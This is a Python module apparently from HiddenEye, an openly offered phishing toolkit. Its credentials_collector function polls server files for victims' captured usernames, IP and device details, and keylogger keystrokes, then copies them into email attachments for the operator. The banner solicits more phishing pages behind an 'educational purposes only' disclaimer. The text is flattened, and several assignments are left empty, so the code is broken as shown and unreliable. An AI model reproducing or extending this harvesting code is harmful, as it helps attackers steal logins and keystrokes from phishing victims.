from Defs.ImportManager.unsorted_will_be_replaced import run_command, wait, chmod, stat import Defs.ThemeManager.theme as theme import Defs.FeatureManager.EmailManager.email_prompt as email_prompt import Defs.ActionManager.Server.server_menu as server_menu default_palette = theme.default_palette def exit_message(port): # Message when HiddenEye exit choice = input( "\n\n{0}[{1}?{0}] Re-run(r) : Exit(x) : Send Email(M) : SelectServer(S)\n\n >> {2}".format(default_palette[0], default_palette[4], default_palette[2])).upper() if choice == 'R' or choice == 'r': run_command('sudo python3') elif choice == 'M' or choice == 'm': email_prompt.captured_data_email_confirmation(port) elif choice == 'S' or choice == 's': server_menu.server_selection(port) elif choice == 'X' or choice == 'x': run_command('clear') print(''' {1}HIDDEN EYE {1}BY: DARKSEC TEAM {0} {1} [[*]] IF YOU LIKE THIS TOOL, THEN PLEASE HELP TO BECOME BETTER. {0} [{1}!{0}] PLEASE LET US KNOW , IF ANY PHISHING PAGE GOT BROKEN . [{1}!{0}] MAKE PULL REQUEST, LET US KNOW YOU SUPPORT US. [{1}!{0}] IF YOU HAVE MORE PHISHING PAGES, THEN JUST MAKE A PULL REQUEST. [{1}!{0}] PLEASE DON'T HARM ANYONE , ITS ONLY FOR EDUCATIONAL PURPOSE. [{1}!{0}] WE WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS TOOL {1} [[*]] THANKS FOR USE THIS TOOL. HAPPY HACKING ... GOOD BYE \n '''.format(default_palette[2], default_palette[0])) else: run_command('clear') return exit_message(port) def terms_of_service_message(): # menu where user select what they wanna use # Terms Of Service wait(6) run_command('clear') orange = '\033[33m' blue = '\033[34m' purple = '\033[35m' red = '\033[31m' print("\n\n\n {1}WITH GREAT {0}POWER {2}- {1}COMES GREAT {0}RESPONSIBILITY ".format(red, purple, blue)) if input("\n\n\n\n{2}[{1}!{2}]{3} Do you agree to use this tool for educational/testing purposes only? {1}({0}Y{1}/{2}N{1})\n{2}HiddenEye >>> {0}".format(default_palette[2], default_palette[4], default_palette[0], orange)).upper() != 'Y': run_command('clear') print("\n\n[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL.YOU CAN ONLY USE IT FOR EDUCATIONAL PURPOSE.!{1} ]\n\n".format(default_palette[0], default_palette[4])) exit() def module_loading_message(module): # This one just show text.. print('''\n {0}[{1}*{0}] SELECT ANY ONE MODE...{0}\n--------------------------------'''.format(default_palette[0], default_palette[2])) def credentials_collector(port): print("{0}[{1}*{0}]{1} Waiting For Victim Interaction. Keep Eyes On Requests Coming From Victim ... \n{2}________________________________________________________________________________\n".format(default_palette[0], default_palette[2], default_palette[4])) while True: with open('Server/www/usernames.txt') as creds: lines = if len(lines) != 0: log_writer('\n {0}[{1} CREDENTIALS FOUND {0}]{1}:\n {0}{2}{1}'.format(default_palette[2], default_palette[3], lines)) run_command("touch Server/CapturedData/usernames.txt && cat Server/www/usernames.txt >> Server/CapturedData/usernames.txt && cp Server/CapturedData/usernames.txt Defs/Send_Email/attachments/usernames.txt && echo -n '' > Server/www/usernames.txt") with open('Server/www/ip.txt') as creds: lines = if len(lines) != 0: log_writer('\n {0}[{1} DEVICE DETAILS FOUND {0}]{1}:\n {0}{2}{1}'.format(default_palette[2], default_palette[3], lines)) run_command('touch Server/CapturedData/ip.txt && cat Server/www/ip.txt >> Server/CapturedData/ip.txt && cp Server/CapturedData/ip.txt Defs/Send_Email/attachments/ip.txt && rm -rf Server/www/ip.txt && touch Server/www/ip.txt') creds.close() with open('Server/www/KeyloggerData.txt') as creds: lines = if len(lines) != 0: log_writer('{0}...............................'.format(default_palette[0])) log_writer(' {1}[{0} GETTING PRESSED KEYS {1}]{1}:\n {0}{2}{1}'.format(default_palette[3], default_palette[2], lines)) run_command('touch Server/CapturedData/KeyloggerData.txt && cat Server/www/KeyloggerData.txt >> Server/CapturedData/KeyloggerData.txt && cp Server/CapturedData/KeyloggerData.txt Defs/Send_Email/attachments/KeyloggerData.txt && rm -rf Server/www/KeyloggerData.txt && touch Server/www/KeyloggerData.txt') log_writer('{0}...............................'.format(default_palette[0])) creds.close() def log_writer(ctx): # Writing log logFile = open("log.txt", "w") logFile.write(ctx.replace(default_palette[0], "").replace(default_palette[1], "").replace(default_palette[2], "").replace(default_palette[3], "").replace(default_palette[4], "") + "\n") print(ctx) def port_selector(): # Question where user must select port run_command('clear') print(''' {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {0} {0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ WEBSERVER PORT SELECTION ]{1}!! {0}\n-------------------------------'''.format(default_palette[0], default_palette[2])) print("\n {0}[{1}*{0}]{0}Select Any Available Port [1-65535]:{1}".format(default_palette[0], default_palette[4])) choice = input(" \n{0}HiddenEye >>> {1}".format(default_palette[0], default_palette[2])) try: if (int(choice) > 65535 or int(choice) < 1): return selectPort() else: return choice except: return port_selector() def remove_readonly(func, path, _): "Clear the readonly bit and reattempt the removal" chmod(path, stat.S_IWRITE) func(path)